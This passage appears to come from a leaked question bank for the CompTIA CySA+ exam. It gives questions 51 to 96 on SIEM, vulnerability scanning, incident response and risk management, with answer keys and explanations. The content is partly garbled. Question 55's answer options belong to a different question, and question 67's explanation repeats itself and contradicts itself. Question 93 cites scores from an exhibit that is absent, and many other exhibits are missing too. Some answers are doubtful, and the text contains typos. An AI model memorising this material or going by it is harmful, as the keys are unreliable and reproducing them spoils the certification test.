following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A. Integrate an IT service delivery ticketing system to track remediation and closure

B. Create a compensating control item until the system can be fully patched
C. Accept the risk and decommission current assets as end of life
D. Request an exception and manually patch each system

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://phoenix.security/using-slas-for-better-vulnerability-management-remediation-improving-
developers-workflow/

QUESTION 52
Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a
known-malicious IP address?

A. Join an information sharing and analysis center specific to the company's industry
B. Upload threat intelligence to the IPS in STIX'TAXII format
C. Add data enrichment for IPs in the ingestion pipeline
D. Review threat feeds after viewing the SIEM alert

Correct Answer: C
Explanation

Explanation/Reference:
The best option to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address
is C. Add data enrichment for IPS in the ingestion pipeline.
Data enrichment is the process of adding more information and context to raw data, such as IP addresses,
by using external sources. Data enrichment can help analysts to gain more insights into the nature and
origin of the threats they face, and to prioritize and respond to them accordingly. Data enrichment for IPS
(Intrusion Prevention System) means that the IPS can use enriched data to block or alert on malicious
traffic based on various criteria, such as geolocation, reputation, threat intelligence, or behavior. By adding
data enrichment for IPS in the ingestion pipeline, analysts can leverage the IPS’s capabilities to filter out
known-malicious IP addresses before they reach the SIEM, or to tag them with relevant information for
further analysis. This can save time and resources for the analysts, and improve the accuracy and
efficiency of the SIEM.
The other options are not as effective or efficient as data enrichment for IPS in the ingestion pipeline.
Joining an information sharing and analysis center (ISAC) specific to the company’s industry (A) can
provide valuable threat intelligence and best practices, but it may not be timely or comprehensive enough
to cover all possible malicious IP addresses. Uploading threat intelligence to the IPS in STIX/TAXII format
(B) can help the IPS to identify and block malicious IP addresses based on standardized indicators of
compromise, but it may require manual or periodic updates and integration with the SIEM. Reviewing
threat feeds after viewing the SIEM alert (D) can help analysts to verify and contextualize the malicious IP
addresses, but it may be too late or too slow to prevent or mitigate the damage. Therefore, C is the best
option among the choices given.

Reference: https://ipinfo.io/use-cases/ip-data-for-data-enrichment
QUESTION 53
An organization was compromised, and the usernames and passwords of all employees were leaked
online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

Correct Answer: A
Explanation

Explanation/Reference:
Multifactor authentication (MFA) is a security method that requires users to provide two or more pieces of
evidence to verify their identity, such as a password, a PIN, a fingerprint, or a one-time code. MFA can
reduce the impact of a credential leak because even if the attackers have the usernames and passwords
of the
employees, they would still need another factor to access the organization’s systems and resources.
Password changes, system hardening, and password encryption are also good security practices, but they
do not address the immediate threat of compromised credentials.
References: CompTIA CySA+ Certification Exam Objectives, [What Is Multifactor Authentication (MFA)?]

QUESTION 54
A company is deploying new vulnerability scanning software to assess its systems. The current network is
highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which
of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans

B. Deploy a central scanner and perform non-credentialed scans
C. Deploy a cloud-based scanner and perform a network scan
D. Deploy a scanner sensor on every segment and perform credentialed scans

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 55
An organization's email account was compromised by a bad actor. Given the following information:
Which of the following is the length of time the team took to detect the threat?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 56
A security administrator needs to import PII data records from the production environment to the test
environment for testing purposes. Which of the following would best protect data confidentiality?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://aws.amazon.com/what-is/data-masking/#:~:text=Data%20masking%20creates%20fake
%20versions,access%20to%20the%20original%20dataset

QUESTION 57
The email system administrator for an organization configured DKIM signing for all email legitimately sent
by the organization. Which of the following would most likely indicate an email is malicious if the company's
domain name is used as both the sender and the recipient?

A. The message fails a DMARC check

B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://easydmarc.com/tools/dmarc-lookup

QUESTION 58
During an incident involving phishing, a security analyst needs to find the source of the malicious email.
Which of the following techniques would provide the analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 59
An analyst wants to ensure that users only leverage web-based software that has been pre-approved by
the organization. Which of the following should be deployed?

A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://www.sentinelone.com/cybersecurity-101/application-whitelisting/
QUESTION 60
During a cybersecurity incident, one of the web servers at the perimeter network was affected by
ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.

B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.

Correct Answer: C
Explanation

Explanation/Reference:
Quarantining the server is the best action to perform immediately, as it isolates the affected server from the
rest of the network and prevents the ransomware from spreading to other systems or data. Quarantining
the server also preserves the evidence of the ransomware attack, which can be useful for forensic analysis
and law enforcement investigation. The other actions are not as urgent as quarantining the server, as they
may not stop the ransomware infection, or they may destroy valuable evidence. Shutting down the server
may not remove the ransomware, and it may trigger a data deletion mechanism by the ransomware.
Reimaging the server may restore its functionality, but it will also erase any traces of the ransomware and
make recovery of encrypted data impossible. Updating the OS to the latest version may fix some
vulnerabilities, but it will not remove the ransomware or decrypt the data.

https://www.cisa.gov/stopransomware/ransomware-guide
https://www.cisa.gov/stopransomware/ive-been-hit-ransomware

QUESTION 61
An organization recently changed its BC and DR plans. Which of the following would best allow for the
incident response team to test the changes without any impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.

B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

Correct Answer: A
Explanation

Explanation/Reference:
performing a tabletop drill based on previously identified incident scenarios, is the best choice to test the
changes in the BC (Business Continuity) and DR (Disaster Recovery) plans without impacting the
business.

A tabletop drill involves gathering key stakeholders and walking through various hypothetical scenarios
and how they would be handled based on the updated plans.This approach ensures that the organization
can test its preparedness without causing any actual disruption or risk to business operations.

Reference: https://www.alertmedia.com/blog/tabletop-exercises/

QUESTION 62
Security analysts review logs on multiple servers on a daily basis. Which of the following implementations
will give the best central visibility into the events occurring throughout the corporate environment without
logging in to the servers individually?

A. Deploy a database to aggregate the logging

B. Configure the servers to forward logs to a SIEM
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.
Correct Answer: B
Explanation

Explanation/Reference:
The best implementation to give the best central visibility into the events occurring throughout the
corporate environment without logging in to the servers individually is B. Configure the servers to forward
logs to a SIEM.
A SIEM (Security Information and Event Management) is a security solution that helps organizations
detect, analyze, and respond to security threats before they disrupt business1. SIEM tools collect,
aggregate, and correlate log data from various sources across an organization’s network, such as
applications, devices, servers, and users. SIEM tools also provide real-time alerts, dashboards, reports,
and incident response capabilities to help security teams identify and mitigate cyberattacks.
By configuring the servers to forward logs to a SIEM, the security analysts can have a central view of
potential threats and monitor security incidents across the corporate environment without logging in to the
servers individually. This can save time, improve efficiency, and enhance security posture.
Deploying a database to aggregate the logging (A) may not provide the same level of analysis, correlation,
and alerting as a SIEM tool. Sharing the log directory on each server to allow local access © may not be
scalable or secure for a large number of servers. Automating the emailing of logs to the analysts (D) may
not be timely or effective for real-time threat detection and response. Therefore, B is the best option among
the choices given.

QUESTION 63
Following a recent security incident, the Chief Information Security Officer is concerned with improving
visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent
lateral movement and potential data exfiltration. Which of the following techniques will best achieve the
improvement?

A. Mean time to detect

B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime

Correct Answer: A
Explanation

Explanation/Reference:
Improving the Mean Time to Detect (MTTD) is the most relevant technique to achieve the goal of reducing
the time to prevent lateral movement and potential data exfiltration by malicious actors.

MTTD measures the average time it takes for an organization to detect a security incident or malicious
activity once it has occurred. By reducing MTTD, you can identify security threats more quickly, which
allows for a faster response to contain the threat, prevent lateral movement, and potentially stop data
exfiltration before it occurs.

QUESTION 64
After identifying a threat, a company has decided to implement a patch management program to remediate
vulnerabilities. Which of the following risk management principles is the company exercising?

A. Transfer
B. Accept
C. Mitigate
D. Avoid

Correct Answer: C
Explanation

Explanation/Reference:
Mitigate is the best term to describe the risk management principle that the company is exercising, as it
means to reduce the likelihood or impact of a risk. By implementing a patch management program to
remediate vulnerabilities, the company is mitigating the threat of cyberattacks that could exploit those
vulnerabilities and compromise the security or functionality of the systems. The other terms are not as
accurate as mitigate, as they describe different risk management principles. Transfer means to shift the
responsibility or burden of a risk to another party, such as an insurer or a contractor. Accept means to
acknowledge the existence of a risk and decide not to take any action to reduce it, usually because the risk
is low or the cost of mitigation is too high. Avoid means to eliminate the possibility of a risk by changing the
plans or activities that could cause it, such as cancelling a project or discontinuing a service

Reference: https://safetyculture.com/topics/risk-management/

QUESTION 65
A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The
analyst downloads a copy of the file from the email and isolates the affected workstation from the network.
Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software

B. Shut down the email server and quarantine it from the network
C. Acquire a bit-level image of the affected workstation
D. Search for other mail users who have received the same file

Correct Answer: D
Explanation

Explanation/Reference:
This is the containment stage and not eradication, in containment you would go and prevent further
damage to contain the incident, the isolated computer is already hit with ransomware bit level backup won't
make a difference at this point, contain first then move to bit level and forensics to eradicate then wipe
clean

QUESTION 66
The security analyst received the monthly vulnerability report. The following findings were included in the
report:

1. Five of the systems only required a reboot to finalize the patch application
2. Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate
them. Which of the following approaches will best minimize the risk of the outdated servers being
compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

Correct Answer: A
Explanation

Explanation/Reference:
Compensating controls are the best approach to minimize the risk of the outdated servers being
compromised, as they can provide an alternative or additional layer of security when the primary control is
not feasible or effective. Compensating controls are security measures that are implemented to mitigate
the risk of a vulnerability or an attack when the primary control is not feasible or effective. For example, if
the servers are running outdated operating systems and cannot be patched, a compensating control could
be to isolate them from the rest of the network, or to implement a firewall or an intrusion prevention system
to monitor and
block any malicious traffic to or from the servers. Compensating controls can help reduce the likelihood or
impact of an exploit, but they do not eliminate the risk completely. Therefore, the security analyst should
also consider upgrading or replacing the outdated servers as soon as possible.

QUESTION 67
The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting
workstations that are used within the company:
Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users
frequently click on malicious links sent via email?

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D

Correct Answer: C
Explanation

Explanation/Reference:
In this scenario, Vulnerability C is the one that should most concern the analyst, as it has a network attack
vector, high attack complexity, and requires authentication and user interaction. This means that an
attacker could exploit this vulnerability remotely, without the need for direct user interaction, making it a
more critical threat in this context.In this scenario, Vulnerability C is the one that should most concern the
analyst, as it has a network attack vector, high attack complexity, and requires authentication and user
interaction. This means that an attacker could exploit this vulnerability remotely, without the need for direct
user interaction, making it a more critical threat in this context.

QUESTION 68
An incident response analyst is taking over an investigation from another analyst. The investigation has
been going on for the past few days. Which of the following steps is most important during the transition
between the two analysts?

A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 69
A company recently removed administrator rights from all of its end user workstations. An analyst uses
CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the
following information:
Which of the following vulnerabilities should be prioritized for remediation?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 70
A recent penetration test discovered that several employees were enticed to assist attackers by visiting
specific websites and running downloaded files when prompted by phone calls. Which of the following
would best address this issue?

A. Increasing training and awareness for all staff

B. Ensuring that malicious websites cannot be visited
C. Blocking all scripts downloaded from the internet
D. Disabling all staff members’ ability to run downloaded applications

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 71
A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a
mismatch in the login. html file hash. After comparing the code with the previous version of the page
source code, the analyst found the following code snippet added:

Which of the following best describes the activity the analyst has observed?

A. Obfuscated links
B. Exfiltration
C. Unauthorized changes
D. Beaconing

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 72
A security administrator has been notified by the IT operations department that some vulnerability reports
contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scar
B. External scan
C. Differential scan
D. Network scan

Correct Answer: A
Explanation

Explanation/Reference:
A credentialed scan is a type of vulnerability scan that uses valid credentials to log in to the scanned
systems and perform a more thorough and accurate assessment of their vulnerabilities. A credentialed
scan can access more information than a non-credentialed scan, such as registry keys, patch levels,
configuration settings, and installed applications. A credentialed scan can also reduce the number of false
positives and false negatives, as it can verify the actual state of the system rather than relying on inference
or assumptions. The other types of scans are not related to the issue of incomplete findings, as they refer
to different aspects of vulnerability scanning, such as the scope, location, or frequency of the scan. An
external scan is a scan that is performed from outside the network perimeter, usually from the internet. An
external scan can reveal how an attacker would see the network and what vulnerabilities are exposed to
the public. An external scan cannot access internal systems or resources that are behind firewalls or other
security controls. A differential scan is a scan that compares the results of two scans and highlights the
differences between them. A differential scan can help identify changes in the network environment, such
as new vulnerabilities, patched vulnerabilities, or new devices. A differential scan does not provide a
complete list of findings by itself, but rather a summary of changes. A
network scan is a scan that focuses on the network layer of the OSI model and detects vulnerabilities
related to network devices, protocols, services, and configurations. A network scan can discover open
ports, misconfigured firewalls, unencrypted traffic, and other network-related issues. A network scan does
not provide information about the application layer or the host layer of the OSI model, such as web
applications or operating systems.

Reference: https://www.splunk.com/en_us/blog/learn/vulnerability-scanning.html

QUESTION 73
An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed
logins occur within one minute. However, the control was unable to detect an attack with nine failed logins.
Which of the following best represents what occurred?

A. False positive
B. True negative
C. False negative
D. True positive

Correct Answer: C
Explanation

Explanation/Reference:
A false negative occurs when a security system or control fails to identify an actual threat or attack, which
is the case here. The rule should have detected the attack, but it did not, leading to a false negative result.

QUESTION 74
A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go
and whether there are URIs that should be denied access prior to more in-depth scanning. Which of
following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

Correct Answer: B
Explanation

Explanation/Reference:
A discovery scan is typically used to identify the scope of a web application and understand where the
scan will go. This type of scan is often the first step in assessing a web application's security and helps the
analyst determine which areas should be further examined or tested in-depth.

Reference: https://qualysguard.qg2.apps.qualys.com/portal-help/en/was/scans/scanning_basics.htm

QUESTION 75
Which of the following best describes the process of requiring remediation of a known threat within a given
time frame?

A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance

Correct Answer: A
Explanation
Explanation/Reference:
An SLA is a formal agreement between two parties that defines the level of service, responsibilities, and
expectations. It often includes specific terms related to the time frame within which certain actions or
services must be performed. Requiring remediation of a known threat within a given time frame can be part
of an SLA related to cybersecurity or incident response, ensuring that security issues are addressed
promptly and effectively.

QUESTION 76
Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept
B. Avoid
C. Mitigate
D. Transfer

Correct Answer: D
Explanation

Explanation/Reference:
Transfer is the risk management principle that is accomplished by purchasing cyber insurance. Transfer is
a strategy that involves shifting the risk or its consequences to another party, such as an insurance
company, a vendor, or a partner. Transfer does not eliminate the risk, but it reduces the potential impact or
liability of the risk for the original party. Cyber insurance is a type of insurance that covers the losses and
damages resulting from cyberattacks, such as data breaches, ransomware, denial-of-service attacks, or
network disruptions. Cyber insurance can help transfer the risk of cyber incidents by providing financial
compensation, legal assistance, or recovery services to the insured party.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered

QUESTION 77
A recent audit of the vulnerability management program outlined the finding for increased awareness of
secure coding practices. Which of the following would be best to address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers

B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network
D. Deploy more vulnerability scanners for increased coverage

Correct Answer: A
Explanation

Explanation/Reference:
The finding in the audit suggests a need to improve awareness of secure coding practices. The most
appropriate action to address this finding is to provide training to the development team on secure coding
practices.

QUESTION 78
An organization has deployed a cloud-based storage system for shared data that is in phase two of the
data life cycle. Which of the following controls should the security team ensure are addressed? (Choose
two.)

A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls
Correct Answer: CD
Explanation

Explanation/Reference:
This question is about management of data security and compliance in the cloud with regard to data life
cycle.
DLP - Azure, GCP, and AWS have many resources and tools available to identify confidential data in use,
in storage, and in transit and then understand how that data is used to protect it in a shared data
environment.
Encryption - is used to protect the data at rest on storage devices, in transit, and even in use. It protects
connectivity to the cloud, data stored in the could, etc...
Both DLP and Encryption is a part of the data life cycle management.

QUESTION 79
An analyst is conducting routine vulnerability assessments on the company infrastructure. When
performing these scans, a business-critical server crashes, and the cause is traced back to the
vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.

B. The scanner is running in active mode.
C. The scanner is segmented improperly
D. The scanner is configured with a scanning window

Correct Answer: B
Explanation

Explanation/Reference:
These scans can sometimes overload or disrupt target systems, especially if they are not configured or
managed properly. In some cases, active scans can trigger vulnerabilities or cause service disruptions,
leading to unexpected issues like a server crash.

QUESTION 80
An organization's threat intelligence team notes a recent trend in adversary privilege escalation
procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system
controls and execute commands with privileged credentials. Which of the following controls would be most
effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices
B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 81
A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive
deployment of compensating controls deployment first. The systems have been grouped into the
categories shown below:
Which of the following groups should be prioritized for compensating controls?

A. Group A
B. Group B
C. Group C
D. Group D

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 82
A Chief Information Security Officer wants to map all the attack vectors that the company faces each day.
Which of the following recommendations should the company align their security controls around?

A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 83
Which of the following actions would an analyst most likely perform after an incident has been
investigated?

A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise

Correct Answer: B
Explanation

Explanation/Reference:
After an incident has been investigated, one of the most important actions is to perform a root cause
analysis. Root cause analysis helps in identifying the underlying reasons or factors that led to the incident
in the first place. By understanding the root causes, organizations can implement corrective actions to
prevent similar incidents from occurring in the future. This analysis is crucial for improving the overall
security posture and resilience of the organization.
Reference: https://www.ibm.com/topics/incident-response

QUESTION 84
After completing a review of network activity, the threat hunting team discovers a device on the network
that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which
of the following is potentially occurring?

A. Irregular peer-to-peer communication

B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration

Correct Answer: D
Explanation

Explanation/Reference:
Data exfiltration is the theft or unauthorized transfer or movement of data from a device or network. It can
occur as part of an automated attack or manually, on-site or through an internet connection, and involve
various methods. It can affect personal or corporate data, such as sensitive or confidential information.
Data exfiltration can be prevented or detected by using compression, encryption, authentication,
authorization, and other controls

The network activity shows that a device on the network is sending an outbound email via a mail client to a
non-company email address daily at 10:00 p.m. This could indicate that the device is compromised by
malware or an insider threat, and that the email is used to exfiltrate data from the network to an external
party.
The email could contain attachments, links, or hidden data that contain the stolen information. The timing
of the email could be designed to avoid detection by normal network monitoring or security systems.

QUESTION 85
A vulnerability scanner generates the following output:
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities.
Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK
B. Cisco Webex
C. Redis Server
D. SSL Self-signed Certificate

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 86
A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-
facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity

Correct Answer: D
Explanation

Explanation/Reference:
Identifying the IP/hostname for the requests and looking at the related activity is the first step in
understanding the nature of the issue. This step is crucial for making informed decisions about how to
respond to the situation.

Once the analyst has gathered more information, they can then decide whether further escalation or
actions are necessary, such as alerting the incident response team or notifying higher management.

QUESTION 87
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all
contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

Correct Answer: B
Explanation

Explanation/Reference:
It's essential to investigate the anomalous entries to understand whether they indicate a potential attack or
malicious activity. This involves analyzing the nature of the odd characters, their patterns, and their
potential impact on the web server.

QUESTION 88
A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is
shown below:

Which of the following has most likely occurred?

A. An Office document with a malicious macro was opened.
B. A credential-stealing website was visited.
C. A phishing link in an email was clicked
D. A web browser vulnerability was exploited.

Correct Answer: A
Explanation

Explanation/Reference:
for the suspicious activity on the company laptop, as it reflects the common technique of using macros to
execute PowerShell commands that download and run malware. A macro is a piece of code that can
automate tasks or perform actions in an Office document, such as a Word file or an Excel spreadsheet.
Macros can be useful and legitimate, but they can also be abused by threat actors to deliver malware or
perform malicious actions on the system. A malicious macro can be embedded in an Office document that
is sent as an attachment in a phishing email or hosted on a compromised website. When the user opens
the document, they may be prompted to enable macros or content, which will trigger the execution of the
malicious code.
The malicious macro can then use PowerShell, which is a scripting language and command-line shell that
is built into Windows, to perform various tasks, such as downloading and running malware from a remote
URL, bypassing security controls, or establishing persistence on the system. The log excerpt shows that
PowerShell was used to download a string from a URL using the WebClient.DownloadString method,
which is a common way to fetch and execute malicious code from the internet. The log also shows that
PowerShell was used to invoke an expression (iex) that contains obfuscated code, which is another
common way to evade detection and analysis. The other options are not as likely as an Office document
with a malicious macro was opened, as they do not match the evidence in the log excerpt. A credential-
stealing website was visited is possible, but it does not explain why PowerShell was used to download and
execute code from a URL. A phishing link in an email was clicked is also possible, but it does not explain
what happened after the link was clicked or how PowerShell was involved. A web browser vulnerability
was exploited is unlikely, as it does not explain why PowerShell was used to download and execute code
from a URL.

QUESTION 89
During the log analysis phase, the following suspicious command is detected

Which of the following is being attempted?

A. Buffer overflow
B. RCE
C. ICMP tunneling
D. Smurf attack

Correct Answer: B
Explanation

Explanation/Reference:
RCE stands for remote code execution, which is a type of attack that allows an attacker to execute
arbitrary commands on a target system. The suspicious command in the question is an example of RCE,
as it tries to download and execute a malicious file from a remote server using the wget and chmod
commands. A buffer overflow is a type of vulnerability that occurs when a program writes more data to a
memory buffer than it can hold, potentially overwriting other memory
locations and corrupting the program’s execution. ICMP tunneling is a technique that uses ICMP packets
to encapsulate and transmit data that would normally be blocked by firewalls or filters. A smurf attack is a
type of DDoS attack that floods a network with ICMP echo requests, causing all devices on the network to
reply and generate a large amount of traffic. Verified References: What Is Buffer Overflow? Attacks, Types
& Vulnerabilities - Fortinet1, What Is a Smurf Attack? Smurf DDoS Attack | Fortinet2, exploit - Interpreting
CVE ratings: Buffer Overflow vs. Denial of …3
QUESTION 90
Which of the following is described as a method of enforcing a security policy between cloud customers
and cloud services?

A. CASB
B. DMARC
C. SIEM
D. PAM

Correct Answer: A
Explanation

Explanation/Reference:
A CASB (Cloud Access Security Broker) is a security solution that acts as an intermediary between cloud
users and cloud providers, and monitors and enforces security policies for cloud access and usage. A
CASB can help organizations protect their data and applications in the cloud from unauthorized or
malicious access, as well as comply with regulatory standards and best practices. A CASB can also
provide visibility, control, and analytics for cloud activity, and identify and mitigate potential threats
The other options are not correct. DMARC (Domain-based Message Authentication, Reporting and
Conformance) is an email authentication protocol that helps email domain owners prevent spoofing and
phishing attacks by verifying the sender’s identity and instructing the receiver how to handle
unauthenticated messages SIEM (Security Information and Event Management) is a security solution that
collects, aggregates, and analyzes log data from various sources across an organization’s network, such
as applications, devices, servers, and users, and provides real-time alerts, dashboards, reports, and
incident response capabilities to help security teams identify and mitigate cyberattacks PAM (Privileged
Access Management) is a security solution that helps organizations manage and protect the access and
permissions of users, accounts, processes, and systems that have elevated or administrative privileges.
PAM can help prevent credential theft, data breaches, insider threats, and compliance violations by
monitoring, detecting, and preventing unauthorized privileged access to critical resources

QUESTION 91
During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an
employee to a public email address. The analyst finds that the external email is the employee's personal
email.

Which of the following should the analyst recommend be done first?

A. Place a legal hold on the employee's mailbox.

B. Enable filtering on the web proxy.
C. Disable the public email access with CASB.
D. Configure a deny rule on the firewall.

Correct Answer: A
Explanation

Explanation/Reference:
Placing a legal hold on the employee’s mailbox is the best action to perform first, as it preserves all
mailbox content, including deleted items and original versions of modified items, for potential legal or
forensic purposes. A legal hold is a feature that allows an administrator to retain mailbox data for a user
indefinitely or for a specified period, regardless of the user’s actions or retention policies. A legal hold can
be applied to a mailbox using Litigation Hold or In-Place Hold in Exchange Server or Exchange Online. A
legal hold can help to ensure that evidence of data exfiltration or other malicious activities is not lost or
tampered with, and that the organization can comply with any legal or regulatory obligations. The other
actions are not as urgent or effective as placing a legal hold on the employee’s mailbox, as they do not
address the immediate threat of data loss or compromise. Enabling filtering on the web proxy may help to
prevent some types of data exfiltration or malicious traffic, but it does not help to recover or preserve the
data that has already been emailed externally. Disabling the public email access with CASB (Cloud Access
Security Broker) may help to block or monitor the use of public email services by employees, but it does
not help to recover or preserve the data that has already been emailed externally. Configuring a deny rule
on the firewall may help to block or monitor the network traffic from the employee’s laptop, but it does not
help to recover or preserve the data that has already been emailed externally.
QUESTION 92
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target
the company's business type may be able to breach the network and remain inside of it for an extended
period of time.

Which of the following techniques should be performed to meet the CISO's goals?

A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty

Correct Answer: B
Explanation

Explanation/Reference:
Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs)
of a specific threat actor or group to test the effectiveness of the security controls and incident response
capabilities of an organization. Adversary emulation can help identify and address the gaps and
weaknesses in the security posture of an organization, as well as improve the readiness and skills of the
security team. Adversary emulation can also help measure the dwell time, which is the duration that a
threat actor remains undetected inside the network.
The other options are not the best techniques to meet the CISO’s goals. Vulnerability scanning (A) is a
technique that involves scanning the network and systems for known vulnerabilities, but it does not
simulate a real attack or test the incident response capabilities. Passive discovery © is a technique that
involves collecting
information about the network and systems without sending any packets or probes, but it does not identify
or exploit any vulnerabilities or test the security controls.
Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and
reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific
threat actor or group.

QUESTION 93
A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst
must prioritize which hosts to patch. The analyst runs the tool and receives the following output:

Which of the following hosts should be patched first, based on the metrics?
A. host01
B. host02
C. host03
D. host04

Correct Answer: C
Explanation

Explanation/Reference:
Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest
number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the
exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk
score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which
are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or
data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can
be patched later.

QUESTION 94
Which of the following best describes the reporting metric that should be utilized when measuring the
degree to which a system, application, or user base is affected by an uptime availability outage?

A. Timeline
B. Evidence
C. Impact
D. Scope

Correct Answer: C
Explanation

Explanation/Reference:
The impact metric is the best way to measure the degree to which a system, application, or user base is
affected by an uptime availability outage. The impact metric quantifies the consequences of the outage in
terms of lost revenue, productivity, reputation, customer satisfaction, or other relevant factors. The impact
metric can help prioritize the recovery efforts and justify the resources needed to restore the service.The
other options are not the best ways to measure the degree to which a system, application, or user base is
affected by an uptime availability outage. The timeline metric (A) measures the duration and frequency of
the outage, but not its effects. The evidence metric (B) measures the sources and types of data that can be
used to investigate and analyze the outage, but not its effects. The scope metric (D) measures the extent
and severity of the outage, but not its effects.

QUESTION 95
A security analyst must preserve a system hard drive that was involved in a litigation request

Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.

B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data.

Correct Answer: A
Explanation

Explanation/Reference:
Generating a hash value and making a backup image is the best method to ensure the data on the device
is not modified, as it creates a verifiable copy of the original data that can be used for forensic analysis.
Encrypting the device, protecting it with a password, or performing a memory scan dump do not prevent
the data from being altered or deleted. Verified References: CompTIA CySA+ CS0-002 Certification Study
Guide, page 3291
QUESTION 96
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has
allowed the attacker to prioritize possible next targets.

Which of the following is this an example of?

A. Passive network foot printing

B. OS fingerprinting
C. Service port identification
D. Application versioning

Correct Answer: A
Explanation

Explanation/Reference:
Passive network foot printing is the best description of the example, as it reflects the technique of collecting
information about a network or system by monitoring or sniffing network traffic without sending any packets
